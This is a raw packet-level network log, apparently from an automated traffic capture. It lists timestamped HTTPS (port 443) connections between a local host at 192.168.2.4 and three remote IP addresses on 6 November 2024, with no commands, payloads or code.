                                                                                                                                                                                                            Nov 6, 2024 06:29:40.862488985 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.867291927 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.867384911 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.867805004 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.867825985 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.867825985 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.867856026 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.868221998 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.868227005 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.868325949 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.868330956 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.874777079 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.875148058 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.875164032 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.875509977 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.875514030 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.876264095 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.876528978 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.876548052 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.876853943 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.876858950 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.882447958 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.882735014 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.882755995 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.883088112 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.883094072 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997090101 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997153044 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997301102 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997333050 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997347116 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997358084 CET57676443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997363091 CET4435767613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997596979 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997621059 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997670889 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997690916 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997735977 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997762918 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997793913 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997876883 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997890949 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997899055 CET57677443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:40.997904062 CET4435767713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000307083 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000343084 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000401020 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000444889 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000467062 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000554085 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000564098 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000586987 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000731945 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.000744104 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.007883072 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.007903099 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.007951021 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.007956028 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.007988930 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.008114100 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.008130074 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.008137941 CET57678443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.008142948 CET4435767813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.009943008 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.009964943 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010118008 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010240078 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010250092 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010634899 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010651112 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010696888 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010706902 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010982990 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010987043 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.010987043 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.011003017 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.011039972 CET57679443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.011044025 CET4435767913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.012746096 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.012756109 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.012828112 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.012918949 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.012928963 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.015398026 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.015877008 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.015925884 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.015954018 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.015964985 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.016055107 CET57680443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.016058922 CET4435768013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.017566919 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.017587900 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.017688990 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.017822027 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.017838955 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.461118937 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.461374998 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.461967945 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.462212086 CET57681443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.462232113 CET44357681188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.485380888 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.485414982 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.485605955 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.485858917 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.485869884 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.515594006 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.515600920 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.515613079 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.515638113 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.517421007 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.517427921 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.517723083 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.517738104 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.517832041 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.517843008 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.730009079 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.730438948 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.730470896 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.730863094 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.730868101 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.739715099 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.740412951 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.740412951 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.740426064 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.740432978 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.742974997 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.743571997 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.743572950 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.743593931 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.743606091 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.775676012 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.776510000 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.776510000 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.776530027 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.776539087 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.785254955 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.785725117 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.785748005 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.786232948 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.786237955 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.861063957 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.861471891 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.861557961 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.861557961 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.861594915 CET57684443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.861609936 CET4435768413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.864898920 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.864921093 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.865056992 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.865175009 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.865180969 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.869129896 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.869184017 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.869421005 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.869421005 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.869498968 CET57686443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.869503975 CET4435768613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.871480942 CET57692443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.871516943 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.871706009 CET57692443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.871774912 CET57692443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.871798992 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.875112057 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.875948906 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.876034975 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.876034975 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.876069069 CET57683443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.876082897 CET4435768313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.877788067 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.877815008 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.877918959 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.879259109 CET57693443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.879270077 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.911209106 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.911276102 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.911340952 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.911988020 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.911988974 CET57685443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.911998987 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.912003040 CET4435768513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.913923025 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.913935900 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.914024115 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.914177895 CET57694443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.914190054 CET4435769413.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.921058893 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.921430111 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.921510935 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.921511889 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.921686888 CET57687443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.921695948 CET4435768713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.923377037 CET57695443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.923402071 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.923541069 CET57695443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.923655987 CET57695443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.923666000 CET4435769513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.131567001 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.131890059 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.131912947 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.133059978 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.133498907 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.133498907 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.133671045 CET44357688188.114.96.3192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.140054941 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.140319109 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.140340090 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.140501022 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.140666962 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.140686035 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.141288042 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.141359091 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.141685009 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.141822100 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.142303944 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.142364025 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.142520905 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.142527103 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.145865917 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.145936966 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.176003933 CET57688443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.191082954 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.191083908 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.191107035 CET44357690162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.245851040 CET57690443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306504011 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306560040 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306605101 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306631088 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306633949 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306653023 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306691885 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306718111 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306725025 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.306858063 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.307086945 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.310283899 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.310288906 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.360136986 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.360157967 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.409981012 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428570032 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428637981 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428664923 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428710938 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428750038 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428772926 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428786993 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428858042 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428888083 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428908110 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.428913116 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.429879904 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.429889917 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.477299929 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.477320910 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.521819115 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547194958 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547477007 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547506094 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547545910 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547558069 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547606945 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547780991 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547842026 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547888994 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.547899008 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548268080 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548296928 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548369884 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548374891 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548425913 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548824072 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548934937 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548984051 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.548989058 CET44357689162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.581608057 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.599267006 CET57689443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.606888056 CET4435769313.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.619175911 CET4435769213.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.628911018 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.640909910 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.640914917 CET4435769113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.642179966 CET57691443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.642183065 CET4435769113.107.246.45192.168.2.4
